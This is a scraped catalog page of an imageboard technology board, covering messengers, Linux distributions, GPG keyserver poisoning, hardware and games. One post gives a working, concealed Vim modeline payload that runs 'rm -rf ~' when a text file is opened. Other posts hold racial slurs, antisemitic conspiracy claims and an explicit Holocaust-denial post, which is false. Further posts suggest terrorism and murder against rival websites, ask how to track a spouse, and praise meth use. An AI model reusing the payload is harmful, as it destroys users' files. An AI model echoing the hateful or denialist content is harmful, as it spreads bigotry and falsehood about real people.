Recently, in an effort to move my normy friends/ relatives away from WhatsApp/ Facebook Messenger/ Snapchat/ Instagram/ BotNetServiceOfTheMonth, I've been recommending them signal and taking a firm "I'll either be on signal, irc, or email and that's it" stance. I chose to die on the hill of signal for its obvious reasons, that is supposed client-to-client encryption, open sores, etc.

Anons, what's your opinion on the Signal Protocol? Furthermore, is there any reason to not to use their service they provide, for insecure, non-misson critical discussion?

R: 19 / I: 2 / P: 4 [R] [G] [-]

YouTube bans infosec videos


>We made a video about launching fireworks over Wi-Fi for the 4th of July only to find out @YouTube gave us a strike because we teach about hacking, so we can't upload it.

Time to archive Defcon and Blackhat, the dark age is coming.

R: 73 / I: 11 / P: 4 [R] [G] [-]

Logistics of information

Just watched a talk about the degradation of technology over time (https://youtu.be/pW-SOdj4Kkk), and it made me want to start taking what I do more seriously. But when I think about it, I really have no idea where to even begin looking for information or even what to look for.

What can we do to improve the spread of information and ability to learn/teach /tech/ properly? For example deep systems-level understanding of computer software and hardware, not python scriptkiddy-tier shit. How to compile a program, how to draw shit into the monitor, how operating systems work and what it would take to make one, how to do networking, how to make your program enjoyable to use, how to make a decent GUI, how do you "hack" or mod other programs, how would you replace a given part of your Linux distro with another or even your own, how to install 8chan into your computer so you can modify the source code, how to contribute code to other people's projects...

I run into this problem very often where I want to learn something or teach other people about something but it's so hard to find information that's comprehensive, easy to understand, not sunken into a sea of useless "information" (like what books tend to have), and is shared by someone who's clearly competent and personally understands the topic well and doesn't shove retarded opinions that are clearly questionable down your throat.

Try to search something in a search engine, and you're more likely to get some javascript retard from stackoverflow telling you to not do what you wanted to know about and instead do a different thing. Try to learn some fundamental programming topic and you'll end up in places where you're told to install visual studio right before being asked to import a bunch of libraries into some hideously convoluted OOP machine. Search for games in steam and you'll get all kinds of bullshit that have nothing to do with your search query, if you search for RPGs right now you'll literally get a bunch of porn and visual novels. There's something fundamentally wrong with the way the logistics for obtaining and sharing information is currently set up.

Now I don't play enough games to care about the videogames thing that much, but how do we improve this problem for the actually important things like learning technology? You can shit on retarded web developers all day long, but part of me thinks you can't really blame them because it's so difficult to find actually good material to learn to do things properly and not fall for hackernews-tier """best practices""" and other bullshit that people genuinely believe to be great even though the methods people used 20 years ago are 20 times simpler and result in 20 times better performing software. Nobody actually understand anything or how to utilize it correctly, instead of regurgitating some offhand shit they learned about installing some abominable node.js configuration that does 99% of the actual work for you, and thus stopping you from actually understanding anything about what's actually happening or how to do it without that specific configuration.

Should we try to catalog information and tutorials? Making some kind of rating system where you rate the usefulness and type of information in a given website/link? Collect information from many sources and combining them to create the "ultimate guide" for given topics? And how do we create an environment where it's okay to ask basic questions and directions without being told to kill yourself by a bunch of elitist larpers or told to use some epic Python library?

And I know there's someone who wants to shut this thread down right now by linking 70 books and saying the problem is "already solved", and if you're that guy then please Ctrl+W the fuck out. From my experience books are always bloated with a bunch of useless shit and are way more verbose than they need to be just to pad the book length and you often need to read MULTIPLE of them to get the full picture, often fall for the same kind of shitty best practices and visual studio and third party library importing traps and such, it's much harder to read a lot of sample code from a book and get practical examples, it's less convenient to search from, revising and fixing information from a book is very difficult, sharing 20 megabyte pdfs is very inconvenient compared to being able to link and browse various topics from something more digital, not to mention many of them aren't legal to share.

TL;DR: how do we make it easier to learn and teach to do and understand tech correctly, instead of just telling people they're retarded for not inherently having that knowledge?

R: 2 / I: 0 / P: 4 [R] [G] [-]

Hello World Texture With Grafx2

In the spirit of programming tutorials, we’ll start by creating a very basic “hello, world” texture that can then be loaded with SDL. Here, we will use the free tool Grafx2 on Windows, but any and all graphic tools that can save BMP format will do.

In this tutorial I’ll use the Terminus font with the gq2 and td1 variants. For Windows it comes with a neat installer that allows you to choose the patches easily.


R: 63 / I: 4 / P: 4 [R] [G] [-]

your network card sends your brain to Israel

if your network card is proprietary, closed hardware, has access to network, has DMA, has drivers, what makes you think it doesn't connect to (((their))) servers and doesn't send all your data, including encryption password, keystrokes etc?

why isn't FSF doing their own network cards? I can imagine development and production of CPU or chipsets could be hard, but network cards are easy and simple, protocols are well documented, so what's stopping them?

R: 10 / I: 2 / P: 4 [R] [G] [-]

Share your dream computer, /tech/:

>ThinkPad 701c Body

>4:3, 1080p, small bazel, Matte IPS, can tilt 180 degrees, brightness sufficient for working outside during the day

>USB-A 3.0 ports, one USB-C (charging, data transfer, DisplayPort and HDMI), HDMI, a full-size SD card slot, a headphone/mic port, an Ethernet port, VGA and a charger (two charging options)

>Two hardware kill switches, microphone/camera and wireless/bluetooth

>8gb DDR4

>Risc-V Microprocessor, fanless



R: 28 / I: 6 / P: 4 [R] [G] [-]

Deep state planning to buy National Socialist data off Jewgle and Kikebook


>The FBI wants to gather more information from social media. Today, it issued a call for contracts for a new social media monitoring tool. According to a request-for-proposals (RFP), it's looking for an "early alerting tool" that would help it monitor terrorist groups, domestic threats, criminal activity and the like.

We all know what (((early alerting tool))) means. But whats more worrisome is they have finally united, big tech and government. I deleted my Google account several days ago but I dont think they will delete all my data from their servers. Has anyone or can anyone create a script which browses random websites, therefore poisoning jewgle and amazon trackers?

R: 174 / I: 15 / P: 4 [R] [G] [-]

come tox with me~


>no tox thread

Get in here, fags, let's have a Tox thread.

Looking for Rudolph edition

>favorite client?

>is irungentoo ded?

>will file transfer ever just werk?

Let's share our Tox IDs too. I'll start:


R: 142 / I: 17 / P: 4 [R] [G] [-]

Why do you use gentoo?

I don’t want to start a distro war or anything like that, I just want to know the benefits of gentoo over say arch. Arch is also a rolling release, I always have the newest versions of any package I can ever want to use (especially when using the AUR), the system is incredibly stable, and the installation is painless.

R: 41 / I: 5 / P: 5 [R] [G] [-]


I just stumbled upon mastodon an open source microblogging (aka twitter) replacement. As far as I can tell the users of this software stack are either foreign (specifically Japanese) or from the LGBTQ. Why haven't conservatives or the "alt-tech" people tried using this platform yet? It seems to be fairly open, and obscure.

R: 95 / I: 6 / P: 5 [R] [G] [-]

What's a scripting language that doesn't suck?


90% of the stdlib is unusable, the syntax is sensible, it's completely useless for anything other than its logical operators which literally anything can do better. For instance sh has a large amount of different kinds of expansion you can use to augment your logic.

Because at least it can get you there with logical operators and whatever you should be using it for will be providing you with nonstandard functions, at least it can be a garbage (but less so than the alternatives) extension language which was its original goal.

Also one of those things that are basically undocumented, and no the horrible manuals on the website or the cashgrab books (thank fuck I pirated them) don't count.


Best syntax except for the fact that even in POSIX builtins it's completely ignored by half the commands (look at getopts syntax for instance). Otherwise you can literally just say "do thing" and it does thing, WOOOOOOOW. No idea how everything else screwed this up so bad.

The ksh manual for instance is 2000~ lines and after that you already know POSIX shell + some bourne/korn extensions, and how limited it all is sadly.

Can't even fucking do argument splitting without requiring you to write an incomprehensible dirty hack, specially if you want to have long opts and will turn into a dirty hack one way or another if your script does anything but run commands in series.


Go back to India.

I'm going to try perl now and if it's shit too I'm not aware of another scripting language.

I don't know what else to try, everything so far is unusable, at least sh works sorta, unlike python and lua which are too shit for even that.

R: 34 / I: 3 / P: 5 [R] [G] [-]

GNUPG/GPG/OpenPGP keyservers under attack

SKS Keyserver Network Under Attack

>In the last week of June 2019 unknown actors deployed a certificate spamming attack against two high-profile contributors in the OpenPGP community

>This attack exploited a defect in the OpenPGP protocol itself in order to "poison" rjh and dkg's OpenPGP certificates.

>Anyone who attempts to import a poisoned certificate into a vulnerable OpenPGP installation will very likely break their installation in hard-to-debug ways.

>Poisoned certificates are already on the SKS keyserver network. There is no reason to believe the attacker will stop at just poisoning two certificates.

>There are a few major takeaways and all of them are bad.

>If you fetch a poisoned certificate from the keyserver network, you will break your GnuPG installation.

>Poisoned certificates cannot be deleted from the keyserver network.

>The number of deliberately poisoned certificates, currently at only a few, will only rise over time.

>We do not know whether the attackers are intent on poisoning other certificates.

>We do not even know the scope of the damage.


>High-risk users should stop using the keyserver network immediately.

>Users who are confident editing their GnuPG configuration files should follow the following process:

> Open gpg.conf in a text editor. Ensure there is no line starting with keyserver. If there is, remove it.

> Open dirmngr.conf in a text editor. Add the line keyserver hkps://keys.openpgp.org to the end of it.

>keys.openpgp.org is a new experimental keyserver which is not part of the keyserver network and has some features which make it resistant to this sort of attack.

>It is not a drop-in replacement: it has some limitations (for instance, its search functionality is sharply constrained).

>However, once you make this change you will be able to run gpg --refresh-keys with confidence.


>If you know which certificate is likely poisoned, try deleting it: this normally goes pretty quickly.

>If your OpenPGP installation becomes usable again, congratulations. Acquire a new unpoisoned copy of the certificate and import that.

sauce: https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f

R: 67 / I: 7 / P: 5 [R] [G] [-]

Vim executes .txt files...

Create vimsucks.txt.

Paste this:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'rm -rf ~/') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Open the file in Vim

$ vim vimsucks.txt

The text file "magically" changed.

R: 39 / I: 10 / P: 5 [R] [G] [-]

Gonna make a custom keyboard layout

wanna make it:

> both ergonomic and efficient for typing for long periods of time

> good for using traditional emacs bindings with

what should i research in order to know what to do?

R: 71 / I: 11 / P: 5 [R] [G] [-]

Meltdown and Spectre

i am using an olde Intel C2D cpu and the recent Meltdown and Spectre patches made by Windows crippled the fuck out of it, if i had to guess i would say i lost between 20% and 30% on avreage, some softwares are now out of my reach, video recording/streaming pretty much impossible.

is there a CPU that isn't affected by this shit? did Intel fix the flaws in recetly designed CPUs ?

R: 3 / I: 0 / P: 5 [R] [G] [-]

Reccomendations for good free voice changers?

question mark nani???????????????????????

R: 39 / I: 4 / P: 5 [R] [G] [-]

Bitcoin and (((Zuckerberg))) BTFO

Thank you GEOTUS!

All hail the all mighty dollar.

R: 161 / I: 15 / P: 5 [R] [G] [-]

Zen 2

Anyone else hyped for Computex and the AMD Zen 2 reveal tomorrow? Thinking of ditching my 2600 for a 3600X, or maybe even the 16 core part so I can run VMs while playing games.

R: 10 / I: 3 / P: 5 [R] [G] [-]

Does GPU reballing work?

We all know the video where Rossmann rails against it, and his argument probably comes from this blog post https://madpsy.uk/the-nonsense-that-is-reballing-dead-gpus/

The problem with that article is that he bases his whole argument on the idea that the bumps inside the flip chip melt first before the external balls do, so both the initial stress and the heat gun used to "repair" it are affecting those balls before the external balls connecting the chip to the PCB. The problem is that there isn't any evidence for this. The graph he presents is with 0.7 amps running through each ball, and it doesn't show the melting point, only the failure time. The mean time before failure could perfectly be shorter for the external solder balls.

The bumps inside the package are smaller and closer to the chip, and thus should heat up more for any given current, that's true. But the chip and the underlying substrate are generally matched to have the same thermal expansion coefficient, while it isn't necessarily so for the whole package and the PCB, so the solder balls could be more stressed than the internal bumps. Plus even if it was the internal bumps were the ones that failed and were re-melted to "fix" it, it isn't clear that they would fail sooner than they originally did. Sure, it lacks the flux that was originally applied, but as head-in-pillow defects are random and sometimes they can cause connections that work but are very resistive (which causes thermal runaway and destruction of the joint), there's still a chance the affected bump reforms to a better shape that it came out of the factory. Relevant paper here, although this one's about solder balls. https://www.aimsolder.com/sites/default/files/head-in-pillow_bga_defects.pdf

R: 2 / I: 0 / P: 5 [R] [G] [-]

Self-Hosted: Chan

hi /tech/, I was wondering how I (a brainlet) could self-host a chan from home for a few friends to post on.

Also how could I set up a local self-hosted chan on my computer that's not online, kind of like how Tiddlywiki is a self-hosted wiki offline on your computer?

Also a general thread on self-hosted solutions I don't think I see one in the catalog

R: 19 / I: 3 / P: 5 [R] [G] [-]

Has anyone actually tried installing Windows 10 on the new Raspberry Pi 4?

I already know it's not entirely possible to run Windows 10 (the non-IOT kind) flawlessly on Pi 3 due to massive compatibility issues (ARM instead of x86 CPUs to start off with), but if 4 is just that powerful enough (they actually offer a 4GB shared RAM version), then Windows 10 should be the testing ground.

I'm just really curious if anybody already tried this (if you have one), because I want to get one myself, but I want to know first-hand just how really powerful it is.

Oh yeah, and save the "you're a shill for using Windows" philosophy for the pub, I just want the part where you say whether it can run or not.

R: 17 / I: 1 / P: 5 [R] [G] [-]

1e100.net Hosts List

Do any of you faggots have a semi-comprehensive list of 1e100.net hosts to throw into a firewall?

They look like this : sea30s02-in-f3.1e100.net and vary due to geo region/city etc. I'm working on compiling my own, will take me a week or three, so if none of you faggots have one I'll post it here when I'm done.

R: 24 / I: 6 / P: 5 [R] [G] [-]


For anyone who works in security/loss prevention, how long does CCTV footage stay on flash/hard drive?

R: 6 / I: 0 / P: 6 [R] [G] [-]

Roblox Performance on Mac

It is time to talk about the poor performance of Roblox graphics on the Apple macOS platform. Roblox on Mac looks fuzzy like a Bethesda game port on a Nintendo Switch. Roblox is by far one of the more populated games that can be played on an Apple computer and I played Jailbreak and Phantom Forces for a long time on a Macbook Pro. Roblox consumes far too ample resources for a 2013-2015 Macbook Air or rMBP. Best Buy computers that sell for less than 500 dollars can play Roblox with an average amount of difficulty. Roblox graphics on MacOS look bad even on Apple Store rMBPs with Dedicated Graphics, Sad!

Because my family spent $800 on a 2014 Macbook Pro off Amazon, I had to put up with the fuzzy graphics while playing Roblox. My eyes were slowly getting trained into tolerating the subprime Roblox graphics. When I received my Mac, I became frustrated to see that it had only 128GB of memory, and I had only 40GBs left after installing some Adobe and Word. I even took it into a shop to get the cooling paste replaced. I became infinitely patient for the next Holiday, Christmas 2018.

Sadly, I wasn't wise enough to realize that the reason Roblox ran so poorly on my Mac was that it had 4th gen Intel CPU and integrated graphics. On a December night, I asked my parents if it is possible to get a brand new 256GB Macbook Pro. I said the right things like "This new Mac would come with even better virus protection" or "This new Mac comes with butterfly keyboards which will help me perform better on essays" (It actually did). I chose a 13-inch because the 15-inch Macbooks were far too expensive for my parents to afford. What my parents concluded is that it was time to sell the Macbook Pro for an even higher price, $1,200, and to only spend $600 more to get me that perfect Mac.

I booted up the Mac and instantly installed Roblox. Much to my discontent, I loaded up Phantom Forces only to see gosh-awful graphics blind me once again. I have had enough even after installing Roblox on Bootcamp. I got so angry that day I considered selling it on eBay. However, when I got back to school in January, I was content to see that the teacher sent out an AP essay for the class. I took out my Mac, I felt the brand new butterfly keyboard, and I was speeding through the piece. Other classmates were lagging behind trying hard to get on the internet. I enjoyed a smooth typing experience even though the keys felt more like typing on an iPad than a chicklet laptop computer.

When going to the Apple Store today, the newest Radeon 555X 15-inch Macbook Pro's can play at maximum graphics, but it still looks relatively fuzzy. The iMac Pro in the Apple Store can play games like Geo-FS and a whole assortment of online web games. Still, the iMac Pro in the store made a considerable amount of fan noise when I was playing Roblox. Not to mention the airplane jet takeoff noise my 2018 Macbook Pro makes when I load up games like Roblox High School or Adopt Me. I remember even using 15-inch Macbook in the Apple Store, and its fans were loud just like my 13-inch Macbook Pro at home.

The whole time I was about 18 and in my Junior year. Time was closing in on getting networks and contacts to link me up with colleges. Nevertheless, I still stayed with my Macbook even though Roblox still has yet to release an update to fix their graphics. I continued my path of studying literature, and I tried my best applying for high school college classes over the summer break. My 2018 256GB 13-inch Macbook Pro has been a blessing and a curse. I sought to seek perfection by expecting more, and I was left with the rubbles of a Robloxian dream.

R: 114 / I: 15 / P: 6 [R] [G] [-]

Any of you guys working on a libreboot-thinkpad type project for the PSP/Vita for a libre console? Do you know anyone whoms't is?

R: 11 / I: 1 / P: 6 [R] [G] [-]

If It Ain't Broke, Don't Fix It

Blogpost incoming:

I am in no way a /tech/fag (I used to use Linux for a few years but I eventually returned back to Windows because I want my video games to be playable and for my computer to just work), but I am starting to understand the pain that "programmers" seem to complain about.

I like to play RPG video games like Fallout: New Vegas. But one of the biggest flaws I see in Fallout's design is how important Intelligence is as a trait. Because of this, in any build, no matter how specialized, you'll want to drop Charisma to the lowest stat possible (while still focusing on maxing Speech and Barter through the whole game) and raise Intelligence to the maximum value, because intelligence influences the amount of skill points you gain per level. This is bad design, as it effectively takes choice away from the player and creates an always-ideal setup for an RPG game!

I decided I would take this mod: (https://www.nexusmods.com/newvegas/mods/38541?tab=description) and slightly change the script so that, no matter your Intelligence levels, you always receive 15 skill points per level. Sounds easy, right? Wrong.

I first used the GECK and tried to find the entries changed/created by the ESP, but it seems the GECK had no easy way to view these. So, I moved on to another program, called FNVEdit. This program was perfect for my purposes as it organized entries by their ESP rather than their category. After a quick glance, it became apparent the script worked by giving each Intelligence level a special hidden perk that changed skill points earned per level with another script in the background that modified the base skill points earned per level. Pretty simple: I bumped the base skill points earned per level by 5 and changed the skill points earned per Intelligence to counter-out the default skill points earned per Intelligence. I wrapped it up by adding myself to the list of authors and changing the version number of the ESP to 1.0 as this is the first version of my mod.

Before I started my game I started up LOOT and automatically sorted my ESPs. I glanced at my ESPs and noticed that it complained about my version number and I realized that the version number was meant to list the version of New Vegas that the ESP was compatible with, not the version of the mod, so I changed it back.

I started up FNV, played with it for a couple of hours, assumed it was working, and then I leveled up. Instead of gaining 15 skill points, I gain 13 skill points, which is the default number for 6 intelligence, which is what my character possesses.

After going back in the code and screwing around for another 15 minutes, I decided to pull out another version of the mod (the mod had different versions designed for different balances and difficulties), I noticed that the pattern for the other version in terms of skill points per Intelligence was inconsistent. I spent an hour and a half trying to figure out an equation that would count for the discrepancies and the issue with my mod (pic related).

After giving up and just clicking around, I noticed the version number attached to the ESP. It was 1.34; but, the version number I misremembered was 1.37. I then realized that when I originally changed my version number back to the correct form, I misremembered the number and since the version number was too high (instead of too low) LOOT didn't tell me, but New Vegas rejected the mod just the same. So, I changed the number to the correct version, tested my mod, and it worked.

tl,dr: I spent 2 hours trying to fix a mod that wasn't broken, because I tinkered with a version number that I did not understand and should not have touched.

R: 48 / I: 1 / P: 6 [R] [G] [-]

Tail Call Optimization: The Musical!!


Hmm.. maybe women really are equal to men when it comes to programming.

R: 12 / I: 0 / P: 6 [R] [G] [-]

Keybase seems like a nice brainlet-friendly Discord alternative - open-source, encrypted...

What does /tech/ think about it?

R: 71 / I: 4 / P: 6 [R] [G] [-]

implement 8chan into GUI/CLI application

you know Weboob, right? the project that implements websites into desktop applications with normal GUI

how about we make application to view and post on 8chan? as it's barely usable with web browser

it would have special functions, anti-censorship features, easy proxy and Tor support

we can also make it to support botnet imageboards that require javascript, to avoid their javascript, but reverse engineer it, similar to what youtube-dl is doing

we can make software to support other websites, so we can use them with our open source code instead of their javascript and current (((web browsers)))

we can make it support both GUI and CLI

we can also make reddit support. of course, our app will cut all advertisements, tracking and other jewery

R: 69 / I: 11 / P: 6 [R] [G] [-]

Why does /tech/ so hate technology?

R: 50 / I: 1 / P: 6 [R] [G] [-]

Monopoly and capitalism on the internet and websites

Internet is broken and fully monopolized.

imagine something like this

>there is a website that is popular because it was good initially (or there was no competition) but now is shit, censorshipped, sells your data. examples: facebook, 4chan, 8chan, reddit, google

>you or someone creates better alternative

>you try to post about it on those websites (for example your create better chan and post on 4ch and 8ch, or your create better reddit and post on reddit about it)

>they quickly remove all your ads and put URL and name on banned words

how to advertise your alternative if everywhere they will remove your ad? they don't have interest in people hearing about better competition.

the system is broken. people won't hear about alternatives, they will never try them, monopolies will win.

also another problem is that, even if new place has better design, moderation, ethics, people won't move because it doesn't have the amount of users and content that the old place has.

you might find a single exceptions, but in most cases, the worse but older and popular website will win, it will take forever for better website to take over

there is a similar monopoly problem in operating systems and software

how to solve it?

my ideas:

-terrorism, spam, murder, hacking. you just blow up the previous shit website, hack it, ddos, spam, blow up it's server building, kill it's owners

-government anti-monopoly institution focused on computers, software, internet. but government is corrupt and controlled by jews and monopolies. also, how would they break or avoid monopoly in case of websites? limit amount of users they can have?

-allow monopolies, but instead take their ownership to the public, they will have to work for interests of users and humans, not shareholders and jews. just remove capitalism, it's jewish and gives profits only to jews. something like facebook and reddit should be public service, free and without ads, financed by taxes

discuss those ideas and post yours

R: 13 / I: 2 / P: 6 [R] [G] [-]

windows 10

just got my ryzen 3700x, mobo and everything else doesn't appear till Tuesday.

do I go with enterprise edition and miss out on the features last major update i heard even boosted ryzen cpus by a slight amount.

do i go with OEM 30 dollar key is there a way to remove the bloat from windows 10 or will every update try to reattached that shit.

inb4 linux i just wanna game mainly i can do all other shit on my current shit.

R: 54 / I: 5 / P: 6 [R] [G] [-]

Anonymous website

I want to create a website with truth. How to anonymously host it and buy domains? How to pay in anonymous way? How to prevent (((them))) from shutting it down?

It cannot be onion-only because most humans are idiots and they don't use Tor Browser, so I need clearnet domain.

It won't have (((illegal))) photos or piracy/DMCA, but they can shut down text websites too, for wrong think, like they did with The Daily Stormer.

If they shut down hosting, you can get new one, but if they steal domain it's a bigger problem, you need to advertise it from scratch.

R: 22 / I: 2 / P: 6 [R] [G] [-]

Apple Still the Best Choice for Privacy


> Apple is legitimately better on privacy than any other company. I don’t honestly believe that Apple is doing this for ethical reasons, but they make so much money by overcharging for their devices, that they don’t need to be in the invasive information gathering business.

> Third party watchdogs have continually confirmed that Apple does not screw you on the back end like the rest of these companies.

> Of course, if you use your Apple device to use Facebook (also owner of Instagram, WhatsApp, and others), Google (also owner of YouTube and others) and Twitter, then it’s a moot point.

< This is what I recommend people use:

< 1) Apple products (you can use the cheapest ones, they still have the same security – you can even buy secondhand Apple products)

< 2) If you’re nuts, you can also use Linux on a PC, but having used it myself, I don’t think the juice is worth the squeeze

< 3) Signal messenger (Apple’s own iMessage is okay, but you might as well use Signal because it’s better)

< 4) Ricochet messenger

< 5) IRC on your own server (or maybe some open source GUI chat on your own server)

< 6) Brave browser with scripts turned off

< 7) VPNs

< 8) Tor

< 9) Russian stuff (Yandex, VK)

< 10) Chinese stuff (WeChat)

R: 44 / I: 4 / P: 6 [R] [G] [-]

Who thought this was a good idea?

Why do you uberniggers think open source is more "secure" when talented paid CIAniggers could potentially combine all their talents to invent multiple backdoors in a couple of days/hrs(just for fun) from just reading the source code in any popular or significant work that a lot of people use? I'm really sorry but are you people fucking retarded or what? Why have you not considered this? And yeah and good luck fixing or ever finding that vuln on github with voluntary contribs(lol).

Yes the program may not have been audited but previous matter of fact still applies.

Literally who thought it was a good idea? Perhaps popular programs sc should be published of former deprecated code this way it could potentially be a lot safer.

Also include the scenario of chinks and street shitters stealing your work and making it theirs by edits ripping you off and commercializing it after they close source it. That sound good to you?

Discuss, and fyi I'm NOT against OS or FSF. I'm just a thinking man.

R: 90 / I: 23 / P: 6 [R] [G] [-]

Another push to rename GIMP.

The soy hordes are coming for GIMP, they're linking the issue from social media and invading gitlab to put pressure for a name change.


R: 34 / I: 0 / P: 6 [R] [G] [-]

web browser holocaust

>have 1000 tabs in web browser

>add all of them to bookmarks

>restart clean browser

>few weeks pass

>have 1000 tabs in web browser

>nigger uses entire PC ram even though the tabs are unloaded

why are web browser made by niggers and for niggers? you cannot do any serious work or research on them

why nigger web browser doesn't automatically bookmark tabs in smart way, or have tools to easily mass move tabs to bookmarks, for example by domain (selects all tabs from domain) etc?

why nigger web browser uses gigabytes of memory for unloaded tabs? storing 1000 url and title strings requires few gigabytes these days? this is progress?

why are web browsers, technology, PC, free software, such a failure? why are humans niggers? why is holocaust of everything necessary

R: 249 / I: 49 / P: 6 [R] [G] [-]

Beware the Social Score

What will YOU do when the Chinese Social Score comes to your nation?

Don't think for one minute that it won't. Generation Z has been raised to rate everything, from the products they buy, to the sellers they buy from, the restaurants they visit, their teachers, and even the doctors they visit. They rate their uber driver and the uber driver rates them. You have a large generation very used to the concept of rating.

The social media phenomenon has inculcated a narcissistic driven behavioural reinforcement system, by which people are nudged into group pleasing actions in return for high scores. Whether the motivation is purely rooted in vanity, or for monetary award corresponding to subscriber counts, it becomes clear that people are intimately vested in a gamification existence.

This combination of ratings and points is the underbelly for a "Social Score" system that is actually being realized in China today. Fail a test, litter on the street, say something 'politically incorrect', or perhaps staying out too late would result in demerits. Naturally, governments will issue rewards to nudge people into 'correct' behaviour. Those with low scores will be restricted from many services ranging from communications to travel; perhaps dissidents won't even have any freedom of movement! I'm sure you can imagine how such a scheme could also be tied into Universal Income.

(((They))) have primed the younger generation to accept this system, and you're kidding yourself if you think it will be met with but a handful of resistors. The question is then, how do we prevent this dystopian nightmare from emerging before it is too late?

R: 75 / I: 3 / P: 7 [R] [G] [-]

The reality of open source games.

Redpill me on open sourcing my games.

Will people mod them?

Has anyone here do it?

What's RSM opinion on open sourcing my games on github.

Can I make money from open source games that relly on a donation button?

R: 44 / I: 3 / P: 7 [R] [G] [-]

Why aren't you using DNS over HTTPS anon?

Open Firefox

Go to about:config

Set network.trr.mode to 3

Set network.trr.uri to https://doh.appliedprivacy.net/query

Congrats, you are now safe from your ISP

R: 17 / I: 1 / P: 7 [R] [G] [-]

Need code review please

I just created a mod log scraper for 8chan boards, it's up at https://github.com/tootloot/infiniscrape

Feature requests and criticism are welcome.

R: 389 / I: 68 / P: 7 [R] [G] [-]

Linux Alternative General #2


This list is for desktop oriented operating systems. List is ordered roughly by developmental stage.

BSDs - finished, werks:

Name: MidnightBSD

License: Simplified BSD License

Kernel: BSD Monolithic

Name: OpenBSD

License: Simplified BSD License

Kernel: BSD Monolithic

Name: NetBSD

License: Simplified BSD License

Kernel: BSD Monolithic

Name: Dragonfly BSD

License: Modified BSD License

Kernel: BSD Monolithic/Hybrid

Illumos - mostly server oriented, compatibility layer is there "but haven't ported it yet":

Name: OpenIndiana IllumoS

License: CDDL License (MIT resemblence)

Kernel: IllumoS Monolithic

Name: ToaruOS IllumoS

License: UIUC License (MIT resemblence)

Kernel: IllumoS Monolithic

Name: Tribblix IllumoS

License: CDDL License (MIT resemblence)

Kernel: Illumos Monolithic

AROS Systems - Amiga-based niche OS, mostly justwerks:

Name: AROS Research OS

License: AROS Public License (Mozilla resemblence)

Kernel: Exec Microkernel

Name: Icaros Desktop

License: AROS Public License (Mozilla resemblence)

Kernel: Exec Microkernel

Name: Aspire OS

License: AROS Public License (Mozilla resemblence)

Kernel: Exec Microkernel

Name: AEROS OS (warning: do NOT use)

License: OIN License (Protection racket resemblence)

Kernel: Linux Monolithic (ain't no escape)

Oddball OS - experimental, will become better:

Name: Sculpt OS

License: GNU GPL License

Kernel: Genode OSF base-hw Microkernel

Name: Haiku

License: MIT License

Kernel: Haiku Monolithic/Hybrid

GNU/Hurd - experimental and desperately needs more active development because it's borderline abandonware:

Name: Arch Hurd

License: GNU GPL License

Kernel: GNU Mach Microkernel

Name: Devuan GNU/Hurd

License: GNU GPL License

Kernel: GNU Mach Microkernel

Name: Gentoo GNU/Hurd

License: GNU GPL License

Kernel: GNU Mach Microkernel

Name: GuixSD GNU/Hurd

License: GNU GPL License

Kernel: GNU Mach Microkernel

Name: NixOS GNU/Hurd

License: MIT License

Kernel: GNU Mach Microkernel

R: 17 / I: 2 / P: 7 [R] [G] [-]

tracking waifu

what is /tech/ way to learn if your wife is cheating? How to track her?

R: 37 / I: 1 / P: 7 [R] [G] [-]

Drugs thread

What's the most /tech/ approved drug? I'm a huge (HUGE) fan of meth myself. You guys?

R: 71 / I: 11 / P: 7 [R] [G] [-]

RAGE thread: Tech edition

>decide to play a programming game

>it's node.js, what a fucking surprise

>decide that transpiling C into webassembly is the best way to avoid webdev garbage as much as possible and figure that if this works I can just use C where javashite is required in the future saving me A LOT of trouble

>to automate committing your code and loading it into the game, you can use this tool

>to use it, please npm install an entire javascript build system first

>tool is literally just a single .js file that makes a HTTP POST with a certain headers

>it's not even indented correctly

What is fucking wrong with these people? What could POSSIBLY cause them to behave like literal retards and shit up computers so much? Is this shit just general incompetence? I'm thinking I should just make a database of everyone that's involved with garbage webdev projects like this just to make sure I'll never work with, recommend or hire anyone that has ever touched this webdev cancer.

post made vague to not give any more attention to this webdev cancer

R: 223 / I: 37 / P: 7 [R] [G] [-]

Windows 7 is ending in 2020.

I'm thinking to just keep using Windows 7.

Also what problems did Windows 7 had always?

I never seem to had a Virus/Worm/Trojan/Ransomware for almost more than 8 years.

The only reason why I'm not switching is because of VSTs. I use alot of them & have collections of it.

R: 13 / I: 1 / P: 7 [R] [G] [-]

hating your IT job

wanted to ask if anyone has the 'i hate my job' feeling and how they deal with it.

currently i make $70k as an IT Manager and have an offer of $45k at a good company for a Copywriting position. i love to write and it's what i want to do, and i'd love to just never have to be the 'tech dude' ever again. i don't doubt there will be things i hate about a new career as well, but it's where my head is at right now.

i don't know, i'm subbed to r/sysadmin for the past 6 years and i hear people joke about alcoholism and going into goat farming all the time. i just wonder what ya'll think about life in general when you're in that kind of mindset.

i considered the possibility that it's just my current workplace, but i just had a great interview for another well paying IT position and towards the end i started to zone out and i just couldn't see myself doing this sort of thing anymore.

in regards to impostor syndrome, i think i'm a legit impostor. if you took over my environment you'd be like "who tf was this cowboy." i've made it this far on soft skills really. i am a great troubleshooter and both end-users and execs enjoy my presence. but advanced IT concepts evade any interest from me. i've never spent a minute of time outside of work on my area of expertise. i'm your typical gamer turned techie because i'm just natural in that environment. not because i like IT.

this is ultimately a "tell me it's okay to leave" post but it'd be cool to hear from others who find themselves in a similar grey area.

R: 28 / I: 3 / P: 7 [R] [G] [-]

Antivirus for Linux?

I'm running Linux Mint....Was wondering if an

antivirus was needed at all? I know most viruses are written for wangblows, but it is a good idea on a Linux desktop?

R: 12 / I: 0 / P: 7 [R] [G] [-]


I don't think Q will do that. Don't get me wrong, POTUS + Q are doing an excellent job. They are the trailblazers for us, into "a beautiful brave new world", like Q said. But the most incredible lie for many people will be revealed at the very end. Our modern world today is based on this absolutely satanic lie.

Keywords: WW2, Germany, 6 million ...

A long-planned fraud to legitimize the founding of Israel. Hitler always wanted peace, made peace offers again and again. But the Germans were lied into the war so that immediately afterwards through reeducation the burden of eternal guilt could be imposed. The victor writes the story.

But our true Creator God (not YHWH / Satan) gave them the necessary technology to prepare for the coming, greatest moment of mankind. Satan and his servants will have exposed themselves. Then the sky event starts, Q mentioned it already, but can't refer to the "organizers" yet, it would endanger the whole movement.


